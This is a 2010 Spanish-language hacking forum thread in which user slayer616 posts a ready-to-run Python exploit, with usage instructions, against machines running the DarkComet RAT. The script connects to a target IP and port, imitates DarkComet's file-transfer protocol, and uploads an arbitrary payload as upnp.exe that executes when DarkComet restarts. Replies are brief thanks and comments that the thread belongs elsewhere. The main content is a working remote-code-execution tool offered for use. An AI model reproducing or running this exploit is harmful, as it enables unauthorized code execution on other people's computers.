Página 1 de 1

[Exploit] Hack DarkComet users just with IP!

Publicado: 11 Sep 2010, 22:43
por slayer616
A simple Expoit to hack DarkComet Users, just type in the IP and Port on which DarkComet is running, and upload your payload!
It will get executed when User restarts DarkComet/adds Port!

Just install Python, save this snippet as exploit.py and start it via commandline:
"python exploit.py"

Código: Seleccionar todo

# DarkComet RAT - Exploiter
# written by Slayer616
# Thanks to: Opcodez, Zacherl, steve1020, 2sly, Protocol, all other friends/coders/supporters
import socket
import os
print("-----------------------------------------------------------")
print("DarkComet RAT Exploiter")
print("Coded by Slayer616")
print("-----------------------------------------------------------")
sIP = input("Type in IP of the Remote PC: ")
sPort = input("Type in Port of the Remote PC: ")
sFile = input("Type in full path to Payload: ")
if os.path.exists(sFile):
    bLen= os.path.getsize(sFile)
    if bLen < 8096:
        if sPort.isdigit():
            print("Connecting to %s on Port %s" % (sIP,sPort))
            sSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                sSock.connect((sIP, int(sPort)))
                print("Connected to Remote PC!")
                sData = str(sSock.recv(1024),'ASCII')
                if sData == "IDTYPE":
                    print("Valid Client! Now sending request!")
                    sSock.send(bytes("TRANSFERupnp.exe|DLFILE|562|7","ASCII"))
                    sSock.recv(1024)
                    sData = "Size:%s" % (str(bLen))
                    sSock.send(bytes(sData,"ASCII"))
                    sSock.recv(1024)
                    f = open(sFile,"rb")
                    sData = f.read()
                    f.close()
                    sSock.send(sData)
                    sSock.close()
                    print("Finished! Now wait until Client.exe restarts!")
                else:
                    print("This is not a valid DarkComet Client!")
            except:
               print("Couldnt connect to Remote PC!")
        else:
            print("Port is not a valid Integer!")
    else:
        print("Payload is too great! Use one with less then 8Kbyte!")
else:
    print("File not found!")

Re: [Exploit] Hack DarkComet users just with IP!

Publicado: 11 Sep 2010, 23:39
por ShiveR
m... parece interesante, se agradece! ;)

Re: [Exploit] Hack DarkComet users just with IP!

Publicado: 12 Sep 2010, 02:43
por yorll
Your contributions are greatly appreciated here. Thanks.
Creo que este tema va en otro lugar.

Saludos..

Re: [Exploit] Hack DarkComet users just with IP!

Publicado: 12 Sep 2010, 03:14
por [NIN]
I saw this on HackForums, yet, thank you.

Re: [Exploit] Hack DarkComet users just with IP!

Publicado: 12 Sep 2010, 14:46
por shinichi_kudo
python rulz!

Re: [Exploit] Hack DarkComet users just with IP!

Publicado: 12 Sep 2010, 14:49
por Xpro
Adios al DarkComet... , como dice nuestro amigo del VIP , esto debería ir
en otro lugar..

Se agradece